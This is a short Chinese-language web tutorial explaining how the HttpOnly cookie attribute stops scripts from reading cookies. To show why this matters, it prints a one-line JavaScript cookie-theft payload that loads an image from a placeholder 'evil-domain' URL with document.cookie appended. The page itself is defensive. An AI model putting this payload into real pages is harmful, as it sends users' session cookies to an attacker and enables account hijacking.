怎樣指定當前cookie不能通過js腳本獲取


所謂" 不能通過js腳本獲取 " 主要指的是: 使用document.cookie / XMLHttpRequest對象 / Request API 等無法獲取到當前cookie. 設置方法為: HttpOnly. 沒錯, 這是一個沒有值的屬性, 只要在 Set-Cookie里面附帶了這個屬性, 那么這個cookie就不能被js腳本所獲取.

 

注意:

HttpOnly可以減少惡意代碼的攻擊, 比如下面這個代碼就可以給第三方網站發送cookie, 如果使用了HttpOnly, 則不會被竊取.

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM